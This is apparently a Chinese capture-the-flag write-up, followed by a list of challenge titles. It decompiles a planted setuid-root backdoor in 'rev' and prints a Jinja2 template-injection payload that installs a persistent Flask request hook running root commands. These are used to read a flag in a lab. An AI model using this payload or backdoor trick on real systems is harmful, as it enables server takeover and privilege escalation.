AAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA6AAAAA8AAAADAAAAAAAAANg9AAAAAAAA2C0AAAAA
AAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAPQAAAAGAAAAAwAAAAAAAADgPQAAAAAA
AOAtAAAAAAAA4AEAAAAAAAAGAAAAAAAAAAgAAAAAAAAAEAAAAAAAAACdAAAAAQAAAAMAAAAAAAAA
wD8AAAAAAADALwAAAAAAACgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA/QAAAAEAAAAD
AAAAAAAAAOg/AAAAAAAA6C8AAAAAAAAoAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAAYB
AAABAAAAAwAAAAAAAAAQQAAAAAAAABAwAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAA
AAAAAAAMAQAACAAAAAMAAAAAAAAAIEAAAAAAAAAgMAAAAAAAAAgAAAAAAAAAAAAAAAAAAAABAAAA
AAAAAAAAAAAAAAAAEQEAAAEAAAAwAAAAAAAAAAAAAAAAAAAAIDAAAAAAAAAfAAAAAAAAAAAAAAAA
AAAAAQAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAEAwAAAAAAAAeAMAAAAA
AAAdAAAAEgAAAAgAAAAAAAAAGAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAC4MwAAAAAA
AO4BAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAA
pjUAAAAAAAAaAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA==

放入ida进行编译

int __cdecl main(int argc, const char **argv, const char **envp)
{
  signed int i; // [rsp+1Ch] [rbp-4h]

  for ( i = 1; argc > i + 1; ++i )
  {
    if ( !strcmp("--HDdss", argv[i]) )
      execvp(argv[i + 1LL], (char *const *)&argv[i + 1LL]);
  }
  return 0;
}

程序会遍历命令行参数。
只要某个参数等于 --HDdss，它就会把后面那个参数作为命令来执行。
调用的是 execvp(argv[i+1], &argv[i+1]) → 也就是从 你输入的命令 开始，把剩余的参数一起传递过去。
由于 rev 是 suid root（-rwsr-xr-x root root），你执行的命令就会以 root 权限运行。

所以只需要执行即可读出flag

/usr/bin/rev --HDdss cat /flag

读flag

{{url_for.__globals__['__builtins__']['eval']("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(lambda+:__import__('os').popen('%2f%75%73%72%2f%62%69%6e%2f%72%65%76%20%2d%2d%48%44%64%73%73%20%63%61%74%20%2f%66%6c%61%67').read())")}}

从此开始

签到

misc

Misc入门指北

web

0 Web入门指北

01 第一章 神秘的手镯

02 第二章 初识金曦玄轨

03 第三章 问剑石！篡天改命！

04 第四章 金曦破禁与七绝傀儡阵

05 第五章 打上门来！

06 第六章 藏经禁制？玄机初探！

07 第七章 灵蛛探穴与阴阳双生符

08 第八章 天衍真言，星图显圣

Moe笑传之猜猜爆

09 第九章 星墟禁制·天机问路

10 第十章 天机符阵

10 第十章 天机符阵_revenge

11 第十一章 千机变·破妄之眼

12 第十二章 玉魄玄关·破妄

13 第十三章 通幽关·灵纹诡影

14 第十四章 御神关·补天玉碑

摸金偶遇FLAG，拼尽全力难战胜

01 第一章 神秘的手镯_revenge

15 第十五章 归真关·竞时净魔

16 第十六章 昆仑星途

17 第十七章 星骸迷阵·神念重构

18 第十八章 万卷诡阁·功法连环

19 第十九章 星穹真相·补天归源

19 第十九章_revenge

20 第二十章 幽冥血海·幻语心魔

21 第二十一章 往生漩涡·言灵死局

这是…Webshell？

这是…Webshell?_revenge

22 第二十二章 血海核心·千年手段

Jatopos

01 第一章神秘的手镯

02 第二章初识金曦玄轨

03 第三章问剑石！篡天改命！

04 第四章金曦破禁与七绝傀儡阵

05 第五章打上门来！

06 第六章藏经禁制？玄机初探！

07 第七章灵蛛探穴与阴阳双生符

08 第八章天衍真言，星图显圣

09 第九章星墟禁制·天机问路

10 第十章天机符阵

10 第十章天机符阵_revenge

11 第十一章千机变·破妄之眼

12 第十二章玉魄玄关·破妄

13 第十三章通幽关·灵纹诡影

14 第十四章御神关·补天玉碑

01 第一章神秘的手镯_revenge

15 第十五章归真关·竞时净魔

16 第十六章昆仑星途

17 第十七章星骸迷阵·神念重构

18 第十八章万卷诡阁·功法连环

19 第十九章星穹真相·补天归源

20 第二十章幽冥血海·幻语心魔

21 第二十一章往生漩涡·言灵死局

22 第二十二章血海核心·千年手段